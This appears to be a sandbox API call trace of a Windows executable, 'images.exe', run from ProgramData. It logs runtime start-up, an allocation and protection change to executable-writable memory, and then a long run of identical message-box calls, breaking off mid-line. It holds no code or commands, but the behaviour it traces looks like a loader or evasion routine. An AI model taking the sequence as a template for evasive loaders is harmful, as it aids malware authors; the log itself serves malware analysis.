\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0290.495] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x19f2d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0290.495] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x19fb94, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ°\x1c\x7f¢Ðþ\x19", lpUsedDefaultChar=0x0) returned 256 [0290.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x656d30 [0290.496] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x54c488, nSize=0x104 | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0290.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x22) returned 0x656f00 [0290.496] RtlInitializeSListHead (in: ListHead=0x54c3c0 | out: ListHead=0x54c3c0) [0290.496] GetLastError () returned 0x0 [0290.496] SetLastError (dwErrCode=0x0) [0290.496] GetEnvironmentStringsW () returned 0x662028* [0290.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1293, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1293 [0290.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50d) returned 0x662a50 [0290.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1293, lpMultiByteStr=0x662a50, cbMultiByte=1293, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1293 [0290.496] FreeEnvironmentStringsW (penv=0x662028) returned 1 [0290.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x90) returned 0x659e20 [0290.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1f) returned 0x656cf0 [0290.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e) returned 0x657f70 [0290.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x37) returned 0x65ec10 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3c) returned 0x65b200 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x31) returned 0x65ec50 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x14) returned 0x6527f0 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x24) returned 0x65a680 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xd) returned 0x659a60 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1d) returned 0x65a6b0 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x31) returned 0x65e950 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x15) returned 0x656428 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x17) returned 0x656448 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xe) returned 0x659c10 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x69) returned 0x657a00 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3e) returned 0x65b518 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1b) returned 0x656ab8 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1d) returned 0x656ae0 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x48) returned 0x656f80 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x12) returned 0x656b08 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x18) returned 0x662170 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1b) returned 0x656fd0 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x24) returned 0x662f68 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x29) returned 0x657fa8 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1e) returned 0x662f98 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x6b) returned 0x656b40 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x17) returned 0x6621d0 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xf) returned 0x659a90 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x16) returned 0x662130 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2a) returned 0x657fe0 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x29) returned 0x658018 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x12) returned 0x662070 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x21) returned 0x6524d8 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x16) returned 0x662050 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x22) returned 0x652508 [0290.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x12) returned 0x662090 [0290.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x662a50 | out: hHeap=0x650000) returned 1 [0290.499] GetModuleHandleW (lpModuleName="api-ms-win-core-synch-l1-2-0.dll") returned 0x75ac0000 [0290.571] GetProcAddress (hModule=0x75ac0000, lpProcName="SleepConditionVariableCS") returned 0x75bf7f60 [0290.571] GetProcAddress (hModule=0x75ac0000, lpProcName="WakeAllConditionVariable") returned 0x777c8d70 [0290.571] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x800) returned 0x662430 [0290.572] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0290.572] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x407f5e) returned 0x0 [0290.672] GetProcessHeap () returned 0x650000 [0290.672] RtlWakeAllConditionVariable (in: ConditionVariable=0x54c044 | out: ConditionVariable=0x54c044) [0290.672] RtlWakeAllConditionVariable (in: ConditionVariable=0x54c044 | out: ConditionVariable=0x54c044) [0290.674] GetCurrentThreadId () returned 0xfbc [0290.674] RtlWakeAllConditionVariable (in: ConditionVariable=0x54c044 | out: ConditionVariable=0x54c044) [0290.674] GetStartupInfoW (in: lpStartupInfo=0x19ff00 | out: lpStartupInfo=0x19ff00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\ProgramData\\images.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0290.674] GetCommandLineA () returned="\"C:\\ProgramData\\images.exe\"" [0290.674] CoInitialize (pvReserved=0x0) returned 0x0 [0290.861] VirtualAlloc (lpAddress=0x0, dwSize=0xa00000, flAllocationType=0x3000, flProtect=0x40) returned 0x1ff0000 [0290.861] VirtualProtect (in: lpAddress=0x7574fec0, dwSize=0x100, flNewProtect=0x40, lpflOldProtect=0x19feb4 | out: lpflOldProtect=0x19feb4*=0x20) returned 1 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.868] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.869] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.870] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.871] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.872] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA 